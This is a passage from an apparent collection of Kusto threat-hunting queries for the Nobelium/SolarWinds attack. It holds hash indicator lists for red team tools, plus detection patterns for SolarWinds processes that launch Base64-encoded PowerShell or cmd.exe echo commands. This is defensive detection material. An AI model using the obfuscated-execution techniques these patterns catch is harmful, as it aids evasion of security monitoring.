'ad5bff008e0e270d19eaa7e211b1c821d4091b68',
'7f308945c4904ef168bbf57c86e56c8a3f836a2e',
'74fc338bbab1a1f42699165c588dc91639d0343b',
'4f3ec6a4af8fddf85a0f2933b6cabee44e74fe33',
'41a491270ec2bd6d230be4d163c719e6d46265e7',
'17e199488c301aad10861cdeb1ee5087d2c87517',
'0225b06163d58bc55c6e4f6b451c5553dc9558c7',
'f6bb18873580f645c09758fda398655ce5e3eff3',
'2933c394fa06892dbd1ce2937b4c2344e8239ef8',
'a6119a5c321b2755bffdb4919d910a18b0613842',
'86e975d05de96e0ea088ffdde9993f9247f0ee03',
'3248ac428a7c888723398a5c2535b5b95f550754',
'b1b5dbea32917b7db654dc193de98b840abdbcb5',
'004809dcd28c0cf078d65cc11a478d50cb3cba0d'
]
);
let SHA256Hash = dynamic(
[
'77bdcb2a9873c4629d8675c8ce9cc8a0cf35c514e27f7a6dc2bc4b31f79dd9e2',
'f937aa71e0b1cb3f9a4d5c0e8ffa4f383b781dd878e71e4b73c1f084b4a7e6de',
'8469341f65cc42b86ef7ded04eca8a00266f34d6d2916330af1bf40fb69e26f0',
'd3ca5583c98a4ab0cc65773addd3444435eea13e70e3929629535f14dfe8b63b',
'2051f5d7c79e67a02880ca9f2fc0cdf4fa8827fc515f16baa743193c9b178ba0',
'4ce2df07fecdc7f7852c686440e3b421c159d8fc382481ce70165a77741fb2c4',
'9e170d1146efeee09f888c7b1bbfb10dec3ede9cc0b20b6b137c52dd146fd302',
'2b7a2703e77cb735fae7b90bbd5a2fa481aea1c34c3fb7bfada61cbcebb35efc',
'd0b6413c3dabe564435291b65f28119ad5a9c1fabc05ee48820f728740cb1a03',
'4be84a291b6c6a5f019c1c6b1ceff3b4bc3668d5874b1a423838a57560788158',
'79f2cd2009fe104e5ed6ad25d0ba06b10fb7c0983e88beab27e55b78cd2a5300',
'c4bb5b85710d7e78e82a57eb2ac2c8f7796972bada1ddc6af7ae6d318bc87aa3',
'a9827ea4e45194c65a3ff6cf03345b16bd24047165bd91d4595caae8488529db',
'59a4ae454be71f8a036a7b4c74ae40f4ca6e7105dabfabb4637e87b7a9afb51d',
'fe33146518676279692217e32f8c36a9749d705981e672ebbde79c80b32dd8b7',
'6e1c976151313a24fbd1f620a0a2c66aaf5489d44b8153eb12e789bfbea3731f',
'5751ac3b127f6c8cf251d995ac6254f8999ab227dd6da870f1e0249b3ce56bb6',
'964efc495e4e1a2075fcd48a661166fb8df81d81d8ac2c26768325dc15da7f70',
'd9882283ee2dc487c2a5fb97f8067051c259c4721cd4aea8c435302fe6b274c4',
'c11d6bdda1972a2f538f0daea099df17ce76077098b9f3f72459cf7db1ec5ec6',
'178dc666df641f4f1f184d54c7bcac4764e81bb1c3b03a7207b321660c77770b',
'5756a54a1d9ae74df58008048c6042e7254cc7eed0389f556db3f000cb191000',
'c828558c67601c94511720748a49703b09814bcd21be2caa98b36faa445e19db',
'a57112c53bf2ee334a6d01b39cb43ec8de42ba18ea925d55132567274b742ce6',
'6e05bebdc38c4bd34c83d2ca6b954ce84c87ed78fd0d932576593a3ad710e3c3',
'25e755c8957163376b3437ce808843c1c2598e0fb3c5f31dc958576cd5cde63e',
'8e16cd7d498eb69d7b3e079e1353e0df6eec70a845986475d7cf65a6740b4434',
'44f3c63c1f6414f2c3e602a57ba38f340287fe2acc15ff0c88dca503c67b1a0c',
'fe664bb9dc2976d6d2ccc07582b5c5eb85b896cc439a9af91db7e51b1c905bdb',
'3805caa8e426a6f7d7d3ce9c87ce188b20185b134d936a69b9d51125b1264dea',
'40db7affc23dcaf88c288d6a918b6371a45dcfa16e08543e9442d4d952a9ecc4',
'4878d5d7933e096305c70c83499b84893b6bd0dbe226e16ea90430efeb8b8593',
'faf76f9e66c7392cddbe7bcc73b00dc2ca2d8d1da6f46f5686dadc2e0a559acb',
'09b1003b673b559c3599dcb9250112bd3a602602f2836b54d5d7cdd1c4c4e6f2',
'3f1d22893c626346f8d361076bc66797d55b09a959ec0d36ec3d48048983f138',
'652d3717353df8fc3145ecc9f2c871034a58f2519bdd0c70a72a3d8c88bad48c',
'078403b4e89ff06d2fe2ed7e75428a381f83ffb708dbd01b0220767498947f0c',
'82cce26c60a5105e6caf5ac92eabb3dedcd883cd075f2056f27b0ec58aefaaa6',
'4d004d168b0bb9bed836404e850796173ac27efd8489738394a265478224cf27',
'6652e27ad1bf5002665b2d0821e75092a087103408560682295f90706a3289cb',
'b051ee189faf36e2d6c382fede530e9274b42bc9c42e210b4ee1bc84b0419ba6',
'0340043481091d92dcfb2c498aad3c0afca2fd208ef896f65af790cc147f8891',
'bfe88e7986fbf27db90f18959a0b1e237b6f0395fa11b9eb386e5bac143c1d2d',
'7404a08ecc0aa0d84f039d078ad39804856206ae58dde360238d4a1943557333',
'efb533249f71ea6ebfb6418bb67c94e8fbd5f2a26cbd82ef8ec1d30c0c90c6c1',
'73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f',
'9a84cb10b7ba0b96eea473900d58052511af7b235383b6a496dffab9b982d20d',
'9af4272d6cc0e926f74ccf68d0a4d056eb37059214c312ef3628bca45a7d76cf',
'b262d0c81ac5a13c1a6aa650d1ca7b04117f654a2a97bfe7ac4a7ca8ae9a6ed5',
'432010e6d7a42710b10464e440fa4e2df2bb387839d56a5b371727dc6c3da272',
'b58de9beaf70bfd12cd6fb372f52eff5405f96602c22034a80ef01b4f9e2ded4',
'5f0bc27c272937e3ef788c290939481137148c1c5c70dbb7d1fb13cb22e3e2c1',
'7b59090b78127381593460ccea2ea64d6c5838cd8cb0e97c5e436ae58e69cdee',
'e7046b7eac25ceb5274c815aba4384099524eacf9aed683179aa29ac5f45ede8',
'38c1cab0a8c9870f2cc7cfa5f3f782c0bb8ede94ce89a41a5e9509a79d7fdf5e',
'393cd1ecf955d6938f9a9ba65808a209e7741e2fd17baa91e4960aca799be86f',
'681b1b85a0f8a7ede2c6bf8c71ad4cb56ccc4e1bb400783c93ee9b5ab76d3da6',
'd104de2912949e598f12b2b517bdbec17896cee8305766e72bbb4e604205b2b4',
'eb7bada29bcf4c6b94f7ab710a8a6702f26845c9678826ff0dfc7494a5e8186d',
'4a5f1df73581c531e62e73fe1ab374d1d93b3846d8e6b80833fd295e0fbc23f1',
'895d49db09b64f15782073d4ff4a0fe21cd91f9b9fa9902053278799313b13b1',
'99b622046fb5e122a6f2dadad0858cdd1056582701fb0968c57ec6171dc4c0ee',
'8f79942feb0c8533ce01f867902f4a72d328681249fd474b0215e9d9b4477f67',
'948f9fc9b5979fb66e91964bb2bee0b42b7e8f6b6436188fee9fb69b676d2f42',
'356266255b6aa6ba096cd8048a6a43488ffc21845430d7d0f798fd9022879377',
'4e35c7d135bd7f55cdec68d7acf176ae84b850e927fdffb005e000fef5b35a21',
'609aa1b6ebbeb93a76898219ad470832c4dd838fb3214989841af8b90fcef695',
'5e0fb8cab745678487ac1ed99b5ec2fa2d54a65cbf0e2cb9208785200f2c2b8b',
'aa4349b6531544093c4dbc1d2a7b8680d3308cbde313a38c27cd211dd80ee9d1',
'f0a59a724ee6631b7f2ae88aa9ec7c24a82f8c912512352d93d058a928c33c70',
'1cf5710e500a423b84b51fa3afdd923fe0a8255c5817d3238175623e2ebbfad9',
'959be603c11951ead9c13efd0451ba23e743ec3019562f7715c5b0306ae70537',
'0cb570e4e5229dbe488bba92f57b5951a69335dd625aa6ada0ccb34c918613b2',
'60d3a8c8a7e8bdb67a44ad4f220e52593bf46d2ce6e8d40b6db9045c68cee413',
'71b11d28dec1dadc738c4b993dba32e3c33a85421de66120be62f3ec0ed50c3e',
'b6ef03aec5d10e371f0b06c661036d838ef55fa7dc75cf91fca3622bdefa8140',
'791cb9883187ada5274c976a2e05dc756c48eda88fabdfe2eb7e19f59f0182e5',
'1ba2ef33e69d6bc03ba02a68ecd701b1eee6a33aabd44509e3b344d0948cf9f4',
'1353ffc96e0a701fa8b3dc2835a8be6199e3c8f079663ebffb6b665750ef8af9',
'2effc706d002ebf5c18160ba1cec9f88adbc4a36a3daaf5dbacc8c0dd6ad46b6',
'd13ec5610c22bad31a47b59791b6e964d4703b4019094fd44c8151ee802db7ea',
'3ac5a8f9f2f80b7a8b5267a5cd523dd449b2de5ccb7b30e448ef0dcfc8995506',
'c0621954bd329b5cabe45e92b31053627c27fa40853beb2cce2734fa677ffd93',
'899ad5af2b4ad14fa58612dc2938598ac7e892d759659aef87e4db46d70f62bf',
'e1d466b44e0dffafe4a2d0ebade37ea5f9b6a30ccf16f59d4d2e32f9204a03f8',
'a022820a62198fa3e3b89749b38db1cc3a09136524682fb99a3ce36652725065',
'3c9a7aa8cc4fd0538532e757a756709897c94b2653152a40993c7d0a47503980',
'6c8f967b12cf84eed7b8c039e04614e50cd7fcd8ca9e01563bb6f5f0a11dcb8c',
'bb4229d4fe06209fc7c8ed44da8f353dcb980b5f1a5229c7e1f17b772ff8fd8c',
'e2f7afedf6dbeaeae60a1434a8735acd426087fd16689b29b869ebe88cdbef85',
'504be292cf783ce6cb0c356034e69b76a465ec534386a776663810266d64da33',
'42389f51dc60590c2daab696e8782c3f4dd9f9a4c98a3b987e10d43174deba38',
'eec42b1fb5275eaf3e0229db99421e2b16a3c82bb64da3305662622dc2d6e07a',
'33b8b7198b8e9a24b415d280d673cfa4efe4d249ac9e21703a61c65dc0933d74',
'c91e8e5c2491f7708c4e550c18acab121e1b245ade7b2abb79cdd25b8a9cf379',
'b292ae784ab91b99cc2b8f5cc173813cdb52fb75c6dab85bd1ce05a244b85fca',
'629c0a325f24016534ebc2e0578068593ca883557f8c10cc1ae4d5b0ab91bfec',
'bc6d23e865cdbc4d57451e80797be2b2feff531ca2743c533e5d114c3a19433d',
'7b1e06cf7c362e62b156652b069a4ca1800e0ab72730636f64cc24dabd3830a8',
'cc9da7fce451e409a4d994b4675db6a3651a551b9a004461d14a3d3532765d84'
]
);
DeviceFileEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
| union DeviceImageLoadEvents
| where SHA1 in(SHA1Hash) or SHA256 in(SHA256Hash) or MD5 in(MD5Hash)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/known-affected-software-orion[Nobelium].md
================================================
# View data on software identified as affected by Nobelium campaign
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query searches Threat and Vulnerability Management (TVM) data for Orion software known to be affected by the Nobelium campaign.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceTvmSoftwareVulnerabilities
| where CveId == 'TVM-2020-0002'
| project DeviceId, DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/launching-base64-powershell[Nobelium].md
================================================
# Locate SolarWinds processes launching suspicious PowerShell commands
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when SolarWinds processes launched PowerShell commands that were possibly encoded in Base64. Attackers may encode PowerShell commands in Base64 to obfuscate malicious activity.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
| where FileName =~ "powershell.exe"
// Extract base64 encoded string, ensure valid base64 length
| extend base64_extracted = extract('([A-Za-z0-9+/]{20,}[=]{0,3})', 1, ProcessCommandLine)
| extend base64_extracted = substring(base64_extracted, 0, (strlen(base64_extracted) / 4) * 4)
| extend base64_decoded = replace(@'\0', '', make_string(base64_decode_toarray(base64_extracted)))
//
| where notempty(base64_extracted) and base64_extracted matches regex '[A-Z]' and base64_extracted matches regex '[0-9]'
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/launching-cmd-echo[Nobelium].md
================================================
# Locate SolarWinds processes launching command prompt with the echo command
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query detects events when SolarWinds processes attempted to launch the [cmd.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/cmd) command prompt using the `echo` command. Using `echo` in this way is suspicious, as it is an indirect way of issuing commands, and may not be readily detected by certain kinds of security solutions.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
| where FileName == "cmd.exe" and ProcessCommandLine has "echo"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/locate-dll-created-locally[Nobelium].md
================================================
# Locate Nobelium-related malicious DLLs created in the system or locally
This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.
Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).
Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.
The following query locates malicious Nobelium-associated DLLs that have been created in the system or locally.
More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query
```kusto
DeviceFileEvents
